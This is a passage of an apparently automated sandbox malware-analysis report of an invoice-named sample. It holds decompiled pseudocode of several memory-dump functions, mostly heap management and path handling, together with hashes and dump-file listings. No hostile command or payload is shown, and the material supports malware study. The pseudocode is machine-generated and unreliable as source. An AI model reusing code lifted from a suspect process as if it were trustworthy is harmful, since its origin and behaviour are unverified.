					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E017D96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = L01843C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E017D96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0179B150();
							} else {
								E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0179B150(0x178d4a8, _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										L018514FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E017B7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											L01851411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E017B7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											L01851411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                          0x017cac85
                                                          0x017cac88
                                                          0x017cac8a
                                                          0x017cac8d
                                                          0x017cac91
                                                          0x017cac99
                                                          0x017cac9c
                                                          0x01809f5b
                                                          0x01809f60
                                                          0x01809f60
                                                          0x017caca8
                                                          0x017cacae
                                                          0x017cacda
                                                          0x017cacde
                                                          0x017cace8
                                                          0x017caceb
                                                          0x017cacee
                                                          0x00000000
                                                          0x017cacee
                                                          0x017cacf6
                                                          0x017cacb0
                                                          0x017cacb0
                                                          0x017cacbb
                                                          0x017cacbd
                                                          0x017cacc0
                                                          0x017cacc5
                                                          0x017cadae
                                                          0x017cadb4
                                                          0x017cadb4
                                                          0x017cacd4
                                                          0x017cacd8
                                                          0x017cacf9
                                                          0x017cacff
                                                          0x017cad04
                                                          0x017cad08
                                                          0x017cad09
                                                          0x017cad10
                                                          0x017cad12
                                                          0x017cad18
                                                          0x01809f6f
                                                          0x01809f74
                                                          0x01809f76
                                                          0x01809f7c
                                                          0x01809f84
                                                          0x01809f88
                                                          0x01809f89
                                                          0x01809f90
                                                          0x01809f90
                                                          0x01809f76
                                                          0x017cad1e
                                                          0x017cad24
                                                          0x017cad26
                                                          0x0180a097
                                                          0x0180a09b
                                                          0x0180a0ba
                                                          0x0180a0bf
                                                          0x0180a09d
                                                          0x0180a0b2
                                                          0x0180a0b7
                                                          0x0180a0c5
                                                          0x0180a0c8
                                                          0x0180a0cb
                                                          0x0180a0d2
                                                          0x00000000
                                                          0x017cad2c
                                                          0x017cad2c
                                                          0x017cad2f
                                                          0x017cad34
                                                          0x017cad36
                                                          0x01809f97
                                                          0x01809f9a
                                                          0x00000000
                                                          0x00000000
                                                          0x01809fa9
                                                          0x017cad3e
                                                          0x017cad3e
                                                          0x017cad41
                                                          0x01809fb3
                                                          0x01809fb9
                                                          0x01809fc0
                                                          0x01809fd0
                                                          0x01809fd0
                                                          0x01809fc0
                                                          0x017cad4a
                                                          0x017cad50
                                                          0x017cad5c
                                                          0x017cad62
                                                          0x017cad68
                                                          0x017cad6b
                                                          0x017cad6d
                                                          0x01809fda
                                                          0x01809fdd
                                                          0x00000000
                                                          0x00000000
                                                          0x01809fec
                                                          0x00000000
                                                          0x017cad73
                                                          0x017cad73
                                                          0x017cad73
                                                          0x017cad75
                                                          0x017cad75
                                                          0x017cad78
                                                          0x01809ff6
                                                          0x01809ffc
                                                          0x0180a003
                                                          0x0180a00e
                                                          0x0180a010
                                                          0x0180a01b
                                                          0x0180a01b
                                                          0x0180a01b
                                                          0x0180a038
                                                          0x0180a038
                                                          0x0180a003
                                                          0x017cad84
                                                          0x017cad89
                                                          0x017cad8c
                                                          0x017cad8e
                                                          0x0180a042
                                                          0x0180a045
                                                          0x00000000
                                                          0x00000000
                                                          0x0180a054
                                                          0x00000000
                                                          0x017cad94
                                                          0x017cad94
                                                          0x017cad94
                                                          0x017cad96
                                                          0x017cad96
                                                          0x017cad99
                                                          0x0180a063
                                                          0x0180a065
                                                          0x0180a070
                                                          0x0180a070
                                                          0x0180a070
                                                          0x0180a08d
                                                          0x0180a08d
                                                          0x017cada4
                                                          0x017cada6
                                                          0x00000000
                                                          0x017cada6
                                                          0x017cad8e
                                                          0x017cad6d
                                                          0x017cad3c
                                                          0x017cad3c
                                                          0x00000000
                                                          0x017cad3c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017cacd8

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b76a04691223b0436968b7e529f42e509f289caf53dc02cbb4c9fb7fe999a448
                                                          • Instruction ID: 8b7d52fceeb30c48b8dc6e4150d6c4659c37db85a7b3238948cafc07383b10cb
                                                          • Opcode Fuzzy Hash: b76a04691223b0436968b7e529f42e509f289caf53dc02cbb4c9fb7fe999a448
                                                          • Instruction Fuzzy Hash: 1E31DE31604B89AFE72A8B7CC890BA6FBF4AF05715F0445ADE595C7282E374EA40CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179F018 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E0179F018(intOrPtr __ecx, void* __edx, intOrPtr* _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t28;
				signed char _t32;
				signed char _t34;
				intOrPtr _t35;
				intOrPtr* _t36;
				void* _t39;
				void* _t40;
				intOrPtr* _t41;

				_t35 = __ecx;
				_t41 = _a12;
				_t39 = __edx;
				_v12 = __ecx;
				if(_a8 == 0) {
					if(_t41 != 0) {
						L2:
						_t20 =  *_t41;
						L3:
						_v16 = _v16 & 0x00000000;
						_t21 = _t20 + 0xc;
						_v8 = _t21;
						if(_t21 == 0) {
							_t34 = 0;
						} else {
							_t32 = E017B4620(_t35,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t21);
							_t35 = _v12;
							_t34 = _t32;
							_t21 = _v8;
						}
						if(_t34 == 0) {
							_t40 = 0xc000009a;
							goto L16;
						} else {
							_push( &_v16);
							_push(_t21);
							_push(_t34);
							_push(2);
							_push(_t39);
							_push(_t35);
							_t40 = E017D9650();
							if(_t40 == 0xc0000034) {
								L13:
								if(_t40 >= 0) {
									L20:
									if(_t41 != 0) {
										 *_t41 =  *((intOrPtr*)(_t34 + 8));
									}
									_t36 = _a4;
									if(_t36 != 0) {
										 *_t36 =  *((intOrPtr*)(_t34 + 4));
									}
									L15:
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t34);
									L16:
									return _t40;
								}
								L14:
								if(_t40 == 0x80000005) {
									goto L20;
								}
								goto L15;
							}
							if(_t40 < 0) {
								goto L14;
							}
							if(_a8 == 0 || _t41 == 0) {
								goto L13;
							} else {
								_t28 =  *((intOrPtr*)(_t34 + 8));
								if(_t28 >  *_t41) {
									_t40 = 0x80000005;
									goto L20;
								} else {
									if(_t28 <= _v8) {
										_t14 = _t34 + 0xc; // 0xc
										E017DF3E0(_a8, _t14, _t28);
									}
									goto L13;
								}
							}
						}
					}
					_t20 = 0;
					goto L3;
				}
				if(_t41 == 0) {
					return 0xc000000d;
				}
				goto L2;
			}
















                                                          0x0179f018
                                                          0x0179f026
                                                          0x0179f02a
                                                          0x0179f02c
                                                          0x0179f02f
                                                          0x0179f0dd
                                                          0x0179f03d
                                                          0x0179f03d
                                                          0x0179f03f
                                                          0x0179f03f
                                                          0x0179f043
                                                          0x0179f046
                                                          0x0179f049
                                                          0x017f59a5
                                                          0x0179f04f
                                                          0x0179f05b
                                                          0x0179f060
                                                          0x0179f063
                                                          0x0179f065
                                                          0x0179f065
                                                          0x0179f06a
                                                          0x017f59ac
                                                          0x00000000
                                                          0x0179f070
                                                          0x0179f073
                                                          0x0179f074
                                                          0x0179f075
                                                          0x0179f076
                                                          0x0179f078
                                                          0x0179f079
                                                          0x0179f07f
                                                          0x0179f087
                                                          0x0179f0b3
                                                          0x0179f0b5
                                                          0x0179f0ea
                                                          0x0179f0ec
                                                          0x0179f0f1
                                                          0x0179f0f1
                                                          0x0179f0f3
                                                          0x0179f0f8
                                                          0x0179f0fd
                                                          0x0179f0fd
                                                          0x0179f0bf
                                                          0x0179f0cb
                                                          0x0179f0d0
                                                          0x00000000
                                                          0x0179f0d0
                                                          0x0179f0b7
                                                          0x0179f0bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f0bd
                                                          0x0179f08b
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f091
                                                          0x00000000
                                                          0x0179f097
                                                          0x0179f097
                                                          0x0179f09c
                                                          0x0179f101
                                                          0x00000000
                                                          0x0179f09e
                                                          0x0179f0a1
                                                          0x0179f0a4
                                                          0x0179f0ab
                                                          0x0179f0b0
                                                          0x00000000
                                                          0x0179f0a1
                                                          0x0179f09c
                                                          0x0179f091
                                                          0x0179f06a
                                                          0x0179f0e3
                                                          0x00000000
                                                          0x0179f0e3
                                                          0x0179f037
                                                          0x00000000
                                                          0x017f599b
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db20f70298875c3882e53ea600908e99f950fe3c244c47916f32a80f6b919d5a
                                                          • Instruction ID: fef64f6067d8c3c6415ebcd442e933b6b3b8d7a914da5a3c4548870b1b144f21
                                                          • Opcode Fuzzy Hash: db20f70298875c3882e53ea600908e99f950fe3c244c47916f32a80f6b919d5a
                                                          • Instruction Fuzzy Hash: A731B432A00204ABEF21CE4CE980B6AFBADEB44755F198069EE05DB201D770DD48CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D3D43 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E017A7B60(0, _t61, 0x17711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E017A7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = E017B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                          0x017d3d4c
                                                          0x017d3d50
                                                          0x017d3d55
                                                          0x017d3d5e
                                                          0x0180e79a
                                                          0x00000000
                                                          0x0180e79a
                                                          0x017d3d68
                                                          0x0180e789
                                                          0x017d3d9d
                                                          0x017d3da3
                                                          0x017d3daf
                                                          0x017d3db5
                                                          0x017d3dbc
                                                          0x017d3dc4
                                                          0x017d3dc9
                                                          0x017d3dce
                                                          0x0180e7ae
                                                          0x0180e7ae
                                                          0x017d3dde
                                                          0x017d3de2
                                                          0x017d3de7
                                                          0x017d3e0d
                                                          0x017d3e13
                                                          0x017d3e16
                                                          0x017d3e1e
                                                          0x017d3e25
                                                          0x017d3e28
                                                          0x00000000
                                                          0x00000000
                                                          0x017d3e2a
                                                          0x017d3e2f
                                                          0x017d3e37
                                                          0x017d3e37
                                                          0x00000000
                                                          0x017d3e37
                                                          0x017d3e31
                                                          0x00000000
                                                          0x017d3e31
                                                          0x017d3e20
                                                          0x017d3e20
                                                          0x017d3e35
                                                          0x00000000
                                                          0x017d3de9
                                                          0x017d3de9
                                                          0x017d3de9
                                                          0x017d3dee
                                                          0x017d3dfd
                                                          0x017d3dff
                                                          0x017d3e02
                                                          0x017d3e05
                                                          0x017d3e05
                                                          0x00000000
                                                          0x017d3df0
                                                          0x017d3de7
                                                          0x0180e78f
                                                          0x0180e794
                                                          0x017d3d79
                                                          0x017d3d84
                                                          0x017d3d89
                                                          0x017d3d8e
                                                          0x00000000
                                                          0x0180e7a4
                                                          0x017d3d96
                                                          0x017d3d9a
                                                          0x00000000
                                                          0x017d3d9a
                                                          0x00000000
                                                          0x0180e794
                                                          0x017d3d6e
                                                          0x017d3d73
                                                          0x00000000
                                                          0x0180e7b5
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2708b2ed4ad97838a063af74ad6caa09cbe297cb7dd0b638e4eb7b3d24ea0e4
                                                          • Instruction ID: 47209c641fcfff2e8679a5959c287b622a40802977053c4c8d74c7e5988e7369
                                                          • Opcode Fuzzy Hash: f2708b2ed4ad97838a063af74ad6caa09cbe297cb7dd0b638e4eb7b3d24ea0e4
                                                          • Instruction Fuzzy Hash: DA31AEB1A016199BD729CF2EC84196BFBF5FF9970070984ADE949CB391E630D840C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179F395 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179F395(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				void* _v9;
				char _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				signed char _t24;
				void* _t26;
				signed char _t38;
				intOrPtr _t39;
				signed int _t47;
				void* _t49;
				void* _t50;

				_t39 = __ecx;
				_v20 = __ecx;
				_v16 = 0;
				_t38 = 0;
				_t24 = 0;
				_v9 = 0;
				_t49 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_t50 = 0xc000000d;
				} else {
					_t47 = 0x55;
					_t38 = E0179F358(__ecx, _t47);
					if(_t38 == 0) {
						_t50 = 0xc0000017;
						L17:
						 *(_t49 + 8) =  *(_t49 + 8) & 0x00003fff;
						_t26 = 0;
						L11:
						 *((short*)(_t49 + 0xa)) = _t26;
						return _t50;
					}
					_v24 = _t38;
					_v28 = 0xaa0000;
					_t50 = E017A2EB0(_t47, _a4,  &_v28, 6, 0);
					_t54 = _t50;
					if(_t50 < 0) {
						L13:
						_t24 = 0;
						_v9 = 0;
						_v16 = 0;
						L6:
						if(_t38 != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t38);
							_t24 = _v9;
						}
						if(_t24 == 0) {
							__eflags = _t50;
							if(_t50 >= 0) {
								_t50 = 0xc0000001;
							}
							goto L17;
						} else {
							if(_t50 < 0) {
								goto L17;
							}
							_t26 = _v16;
							 *(_t49 + 8) = (_t24 & 0x000000ff) << 0x0000000e |  *(_t49 + 8) & 0x00003fff;
							goto L11;
						}
					}
					_t50 = E0179F46E(_v20, _v24, _t54,  &_v9, _t39,  &_v16);
					if(_t50 < 0) {
						goto L13;
					}
					_t24 = _v9;
				}
			}















                                                          0x0179f395
                                                          0x0179f3a0
                                                          0x0179f3a4
                                                          0x0179f3a8
                                                          0x0179f3aa
                                                          0x0179f3ac
                                                          0x0179f3b0
                                                          0x0179f3b4
                                                          0x017f5cc8
                                                          0x0179f3c2
                                                          0x0179f3c4
